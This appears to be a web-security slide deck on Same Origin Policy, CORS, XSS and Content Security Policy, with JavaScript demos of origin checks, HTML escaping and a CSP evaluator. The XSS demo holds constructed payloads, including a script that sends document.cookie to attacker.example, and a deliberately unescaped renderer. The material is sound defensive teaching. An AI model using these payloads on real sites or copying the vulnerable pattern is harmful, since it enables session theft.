Same Origin Policy
Cross-Origin Resource Sharing
Content Security Policy
subbul@gmail.com
Agenda
• Need for SOP
• How CORS relaxes SOP safely
• What is XSS?
• How CSP helps prevent XSS
Why Same Origin Policy?
• What if the personal data you are entering on a “Bank” page were readable by any
other page open in the same browser instance?
What is Same Origin Policy
• A browser mechanism: a page’s scripts may read and modify only data (DOM, cookies,
storage, fetched responses) that belongs to the same origin
• An origin is the triple (scheme, host, port); pages that differ in any of the three
are different origins, whatever the path
• It prevents an HTML/JS application in another window, frame or domain from reading
the DOM or data of the current “Origin”
• Thanks to Same Origin Policy (SOP), the browser blocks cross-origin DOM access and
blocks scripts from reading cross-origin responses; it does not stop the request from
being sent or the resource from being embedded (see next slide)
What is allowed under SOP?
• SOP does not prevent cross-site content inclusion: images, scripts and CSS from
another domain can be embedded; what the page cannot do is read their contents
• http://www.google.com/page1 can access http://www.google.com/page2 (same scheme,
host and port)
• http://www.google.com/page1 cannot access http://www.yahoo.com, as the two pages
belong to different origins
• https://www.google.com and http://www.google.com:8080 are likewise different origins
from http://www.google.com (scheme and port count, not only the domain)
• <script src> from another origin is allowed by SOP (file:// URLs are a special
case that each browser handles differently)
• In a http://www.mypage.com page, you can include
<script src="http://api.google.com/googleplus">
• The Google API script is then executed in the “MyPage” origin, with full access to
the “MyPage” DOM. So if the “Google API scripts” are compromised, the attacker has
the run of “MyPage” (this is XSS, Cross Site Scripting, arriving via a third-party
script rather than via user input)
What is not allowed under SOP?
• Reading the response of an AJAX (XHR/fetch) request made to another origin
• An XHR request from “MyPage.com” to “Google.com”: the browser may send the
request, but the script gets no response body back
• Why is it not allowed?
– The request carries the user’s cookies for the target site. If “MyPage.com”
could read the response, any page the user visits could read their logged-in
mail, bank balance or anti-CSRF tokens and send them to a remote server
How to circumvent SOP
• Simple suggestion: DO NOT USE (unless it’s the End of the World)
– document.domain (relaxes the origin to a parent domain; every subdomain that does
the same can then script your page; deprecated in current browsers)
– JSONP (the remote response is executed as script in your page, so you trust that
server completely)
• postMessage is acceptable, but only if the receiver checks event.origin and the
sender passes an explicit targetOrigin, never “*”
• Right Way
– CORS (Cross-Origin Resource Sharing)
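The two slides above say what an origin is and when postMessage is safe; the following is an added example (not part of the original slides) that puts both into running code: an origin comparison using the (scheme, host, port) rule, and a postMessage receiver and sender that keep the origin check. The partner origin https://partner.example and the fake window object in the demo are assumed.

```javascript
// Added example (not part of the original slides). Shows what "same origin"
// actually compares and how to use window.postMessage across origins without
// giving the protection away. Runs in Node.js 18+ or a modern browser; the
// partner origins and the fake window object below are assumed for the demo.

// An origin is the triple (scheme, host, port). Path, query and fragment are
// ignored; a different scheme or port is a different origin.
function originOf(url) {
  return new URL(url).origin;          // e.g. "https://www.example.com:8443"
}

function isSameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// Receiving side of postMessage. `allowedOrigins` is the explicit list of
// origins this page accepts messages from (assumed). `event` is a MessageEvent
// or any object with `origin` and `data`. Returns the accepted payload or null.
function handleIncomingMessage(event, allowedOrigins) {
  // Without this check any page holding a reference to our window (opener,
  // parent, embedded iframe) can feed us data. The check is what makes
  // postMessage safe; the API itself is not the problem.
  if (!allowedOrigins.includes(event.origin)) {
    return null;
  }
  // Accept structured data only; never eval() or innerHTML a received string.
  if (typeof event.data !== 'object' || event.data === null) {
    return null;
  }
  return event.data;
}

// Sending side: name the concrete target origin, never "*", when the payload is
// sensitive. If targetWindow has since navigated to another site, the browser
// drops the message instead of delivering it there.
function sendToPartner(targetWindow, payload, partnerOrigin) {
  if (partnerOrigin === '*') {
    throw new Error('refusing to postMessage sensitive data to "*"');
  }
  targetWindow.postMessage(payload, partnerOrigin);
  return { payload, targetOrigin: partnerOrigin };
}

// Wiring it up in a browser page (assumed partner origin):
//   window.addEventListener('message', e => {
//     const msg = handleIncomingMessage(e, ['https://partner.example']);
//     if (msg) console.log('accepted', msg);
//   });

// Constructed demo when run directly with node:
if (typeof require !== 'undefined' && require.main === module) {
  const pairs = [
    ['http://www.google.com/page1', 'http://www.google.com/page2'],   // true
    ['http://www.google.com/page1', 'https://www.google.com/page1'],  // false: scheme
    ['http://www.google.com/page1', 'http://www.google.com:8080/'],   // false: port
    ['http://www.google.com/page1', 'http://www.yahoo.com/'],         // false: host
  ];
  for (const [a, b] of pairs) console.log(isSameOrigin(a, b), a, b);
  const fakeWindow = { postMessage: (p, o) => console.log('posted', p, 'to', o) };
  sendToPartner(fakeWindow, { token: 'demo' }, 'https://partner.example');
}
```

The receiver compares event.origin against a fixed list rather than testing it with a regular expression or `startsWith`; a pattern like `/partner\.example/` would also match https://partner.example.attacker.test. The same strictness applies to the sender: an explicit targetOrigin is the only thing that stops the message reaching a window that has meanwhile navigated elsewhere.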
Cross-Origin Resource Sharing
• CORS is how a server relaxes SOP for the XHR/fetch responses it is willing to share
• It allows a page on origin A to read a response from origin B, with B’s server
opting in explicitly
• The browser adds an Origin request header; the server answers with
Access-Control-Allow-* response headers, and from those the browser decides whether
the page may read the response
• For “non-simple” requests (methods other than GET/HEAD/POST, custom headers, or a
Content-Type other than form/text) the browser first sends a pre-flight (handshake)
OPTIONS request to learn whether the server allows the method, headers and origin
• The server still sees every cross-origin request arrive; CORS protects the response
from being read by the page, it is not access control for the server
How CORS works?
CORS HTTP Request/Response Headers
• Origin (request, set by the browser; script cannot override it)
– Parameter: <origin>
– Description: the origin of the page making the request
– Example: Origin: http://www.mypage.com
• Access-Control-Allow-Origin (response)
– Parameter: <origin> | *
– Description: the one origin allowed to read the response, or “*” for all; “*” is
not accepted by browsers when credentials are allowed. Send Vary: Origin with it
so caches do not serve one origin’s answer to another
– Example: Access-Control-Allow-Origin: http://mozilla.com
• Access-Control-Allow-Credentials (response)
– Parameter: true
– Description: lets the response be read when the request was sent with cookies or
HTTP auth (withCredentials); only the value true is meaningful, omit it otherwise
– Example: Access-Control-Allow-Credentials: true
• Access-Control-Request-Method (request, preflight only)
– Parameter: GET, POST, PUT, ...
– Description: the method the real request intends to use
– Example: Access-Control-Request-Method: PUT
• Access-Control-Allow-Methods (response, preflight only)
– Parameter: GET, POST, ...
– Description: the methods the server permits cross-origin
– Example: Access-Control-Allow-Methods: GET, POST, PUT
• Access-Control-Request-Headers (request, preflight only)
– Parameter: Content-Type, Custom-Header
– Description: the non-simple headers the real request wants to send
– Example: Access-Control-Request-Headers: Content-Type, Authorization
• Access-Control-Allow-Headers (response, preflight only)
– Parameter: Content-Type | Custom-Header
– Description: the headers the server permits in the real request
– Example: Access-Control-Allow-Headers: Content-Type, Authorization
CORS Server/Browser Request/Response Flow

http://www.html5rocks.com/static/images/cors_server_flowchart.png
XSS (Cross Site Scripting)
• Finding a web page that copies attacker-controlled input into its HTML or JS
without escaping, and using it to inject malicious client-side script that runs
in the victim’s browser, inside the page’s origin
• Types
– Non-persistent / reflected (the server echoes your request back)
– Malicious script placed in an HTML form field or in the HTTP query string, e.g.
during a search request. If the “String” is not escaped for the context where it
lands, the injected script executes in the client browser when the response is
rendered
– The victim has to be made to send the crafted request, e.g. by
• Phishing mails carrying the link
• URL shorteners (bit.ly) that lead to the legitimate page with the “script”
carried along in the URL
XSS (Cross Site Scripting)
– Persistent / stored (the server stores the data and the script)
– A user-provided “string” stored as-is, without escaping the HTML/JS in it, and
served later to all users makes the malicious script execute in every visitor’s
browser
– Message boards that accept plain text and scripts: when another user loads the
board, the malicious code executes and steals that user’s data
– Impact: defacing pages, cookie/session stealing, actions performed in the victim’s
name
Examples
• http://www.insecurelabs.org/Task/Rule1
• http://www.insecurelabs.org
• https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)
How to Prevent XSS
• Escape/encode ALL untrusted data at output, for the context it lands in (HTML
text, attribute, JavaScript string, URL); validating input helps but is not enough
on its own
• No inline please: keep JavaScript in dedicated .js files (this is also what CSP
needs to be effective)
• Secure every input path: query string, form fields, headers, file paths, and data
read back from the database or storage
• Don’t build HTML or JS by string concatenation with untrusted data; use a
templating engine that escapes by default
• This is one of the reasons you find forms in organisations rejecting <, > etc.
(a blunt input filter, not a substitute for output encoding)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• And of course CSP (Content Security Policy)
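The reflected and stored cases from the XSS slides, and the output-encoding advice above, as an added example (not part of the original slides, and not from insecurelabs.org or the OWASP pages): the same “search results” page rendered with raw concatenation and with escaping, plus a constructed in-memory message board for the stored case. The payload strings and the crude detector are constructed for the demo.

```javascript
// Added example (not part of the original slides). A reflected-XSS "search"
// page rendered the unsafe way the slides warn about and the escaped way, plus
// the stored variant on a constructed in-memory message board. Pure functions,
// so it runs under Node.js without a web server; the payloads are constructed.

// Output encoding for the HTML text and quoted-attribute contexts: the five
// characters that can change meaning there become entities.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// VULNERABLE (non-persistent XSS): the query is echoed as-is, so a closing
// quote plus <script>, or an event-handler attribute, becomes live markup.
function renderSearchUnsafe(query) {
  return `<p>Results for: ${query}</p>\n` +
         `<input name="q" value="${query}">`;
}

// FIXED: same page, every untrusted value goes through escapeHtml before it
// touches the HTML, and the attribute is quoted so that escaping is sufficient.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<p>Results for: ${q}</p>\n` +
         `<input name="q" value="${q}">`;
}

// Persistent XSS has the same root cause at a later moment: the fix is still
// to escape at OUTPUT time, when the stored string is put into a page.
const messageBoard = [];                    // constructed stand-in for the database
function storeBoardMessage(text) {
  messageBoard.push(text);                  // stored as typed; no "sanitising" here
  return messageBoard.length;
}
function renderBoard() {
  return messageBoard.map(m => `<li>${escapeHtml(m)}</li>`).join('\n');
}

// Demo-only detector: does the rendered HTML still contain a script tag or an
// attribute breakout? A real test drives a browser; this is enough to compare.
function containsLiveScript(html) {
  return /<script\b/i.test(html) || /"\s+on\w+\s*=/i.test(html);
}

// Constructed attacker inputs.
const COOKIE_THIEF = '"><script>location="https://attacker.example/?c="+document.cookie</script>';
const ATTR_BREAKOUT = '" onmouseover="alert(document.domain)';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe :', containsLiveScript(renderSearchUnsafe(COOKIE_THIEF)));  // true
  console.log('safe   :', containsLiveScript(renderSearchSafe(COOKIE_THIEF)));    // false
  console.log(renderSearchSafe(ATTR_BREAKOUT));
  storeBoardMessage('<img src=x onerror=alert(1)>');
  console.log(renderBoard());
}
```

escapeHtml is only correct for the HTML text and quoted-attribute contexts. Untrusted data placed inside a `<script>` block, a `javascript:` URL or an unquoted attribute needs the encoding for that context (or, better, should not be placed there at all), which is the point the OWASP cheat sheet linked above makes at length.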
Content Security Policy (CSP)
• A policy the browser/user agent enforces, delivered by the HTTP server as a
response header (or a <meta> tag), stating from which sources the page may load and
execute scripts and other resources
• A new HTTP header was introduced to enable CSP:
• Content-Security-Policy: script-src 'self'
• With this policy only scripts from the page’s own origin (the trusted source, e.g.
https://abc.MyWebpage.com) are executed; a script from any other resource is blocked
even if the markup asks for it
Content Security Policy
• If malicious code is injected through XSS (an added <script src="hackedsite.com">),
the browser refuses to load it because hackedsite.com is not in script-src, and
reports the violation
• More XSS prevention by
• Leaving out 'unsafe-inline': this blocks inline JavaScript and CSS (on-page
<script> blocks, onclick= handlers, javascript: URLs); 'unsafe-inline' is the
keyword that turns that protection OFF again
• Leaving out 'unsafe-eval': this blocks text-to-JavaScript mechanisms like eval(),
new Function() and string arguments to setTimeout; 'unsafe-eval' turns that OFF
• default-src 'none' (shut down every script, img, media, font... load that is not
explicitly allowed by a more specific directive)
• Other resources which can be controlled by CSP are font-src, img-src, style-src,
connect-src, frame-src etc.
• Roll out with Content-Security-Policy-Report-Only and a report-uri first to see
what breaks before enforcing
– http://www.html5rocks.com/en/tutorials/security/content-security-policy/
– http://erlend.oftedal.no/blog/csp/readiness/
– http://people.mozilla.org/~bsterne/content-security-policy/details.html
– https://wiki.mozilla.org/index.php?title=Security/CSP/Spec&oldid=133465
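To make the script-src, default-src and 'unsafe-inline' rules on the two CSP slides concrete, here is an added example (not part of the original slides, and not a browser’s implementation): a small evaluator that parses a Content-Security-Policy value and decides whether a given inline or external script would be allowed. It goes beyond the slides in also handling nonces and wildcard hosts. The policy strings, page origin and script URLs in the demo are constructed.

```javascript
// Added example (not part of the original slides). A small evaluator for the
// script-src / default-src part of a Content-Security-Policy header, written
// so the fallback and keyword rules are visible: 'self', 'none', 'unsafe-inline',
// 'nonce-...', scheme sources, host sources with a leading wildcard, and the
// rule that a nonce in the policy switches 'unsafe-inline' off. Hash sources and
// 'strict-dynamic' are left out. Policies and URLs below are constructed.

// "default-src 'none'; script-src 'self' https://cdn.example.com"
//   -> Map { 'default-src' => ["'none'"], 'script-src' => ["'self'", 'https://cdn.example.com'] }
function parsePolicy(headerValue) {
  const policy = new Map();
  for (const part of headerValue.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Sources governing a fetch directive; falls back to default-src. null means the
// policy says nothing about this resource type (so everything is allowed).
function sourcesFor(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (policy.has('default-src')) return policy.get('default-src');
  return null;
}

// Does one host/scheme source expression match `url` for a page at `page`?
function sourceMatches(pattern, url, page) {
  if (pattern === '*') return !['data:', 'blob:', 'filesystem:'].includes(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(pattern)) return url.protocol === pattern.toLowerCase();
  const hasScheme = pattern.includes('://');
  let p;
  try {
    // "*.example.com" is not a valid URL host, so stand in a placeholder label.
    p = new URL((hasScheme ? pattern : `${page.protocol}//${pattern}`).replace('*.', 'wildcard.'));
  } catch {
    return false;
  }
  // A schemeless source inherits the page's scheme; an http page may still
  // upgrade to https sources.
  const schemeOk = hasScheme ? p.protocol === url.protocol
                             : (url.protocol === page.protocol || url.protocol === 'https:');
  if (!schemeOk) return false;
  // No port in the source means the scheme's default port (URL reports that as '').
  if (p.port === '' ? url.port !== '' : p.port !== url.port) return false;
  const host = p.hostname.replace(/^wildcard\./, '*.');
  return host.startsWith('*.') ? url.hostname.endsWith(host.slice(1)) : host === url.hostname;
}

// scriptAllowed(header, pageOrigin, request) -> boolean
//   request = { inline: true, nonce?: 'abc' }    for an inline <script> block
//   request = { url: 'https://...', nonce?: '' } for <script src=...>
function scriptAllowed(headerValue, pageOrigin, request) {
  const sources = sourcesFor(parsePolicy(headerValue), 'script-src');
  if (sources === null) return true;
  if (sources.length === 1 && sources[0] === "'none'") return false;
  const nonceOk = !!request.nonce && sources.includes(`'nonce-${request.nonce}'`);
  if (request.inline) {
    // Once the policy carries a nonce (or hash), browsers ignore 'unsafe-inline':
    // that is how a site migrates to nonces without dropping the keyword first.
    if (sources.some(s => s.startsWith("'nonce-"))) return nonceOk;
    return sources.includes("'unsafe-inline'");
  }
  if (nonceOk) return true;
  const url = new URL(request.url);
  const page = new URL(pageOrigin);
  return sources.some(src => src === "'self'" ? url.origin === page.origin
                                              : !src.startsWith("'") && sourceMatches(src, url, page));
}

if (typeof require !== 'undefined' && require.main === module) {
  const policy = "default-src 'none'; script-src 'self' https://cdn.example.com *.trusted.example 'nonce-r4nd0m'; img-src *";
  const page = 'https://abc.MyWebpage.com';
  for (const req of [
    { url: 'https://abc.MyWebpage.com/app.js' },       // 'self'          -> true
    { url: 'https://hackedsite.com/evil.js' },         // injected by XSS -> false
    { url: 'http://cdn.example.com/lib.js' },          // wrong scheme    -> false
    { url: 'https://a.trusted.example/x.js' },         // wildcard        -> true
    { inline: true },                                  // no nonce        -> false
    { inline: true, nonce: 'r4nd0m' },                 // right nonce     -> true
  ]) console.log(scriptAllowed(policy, page, req), JSON.stringify(req));
}
```

The evaluator makes two of the slides’ points testable: an injected `<script src="https://hackedsite.com/...">` fails because no source matches it, and an inline payload fails as soon as 'unsafe-inline' is absent or a nonce is present. A real nonce must be fresh per response and unguessable (16 random bytes, base64), otherwise the attacker simply copies it into the injected tag.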
Thank You
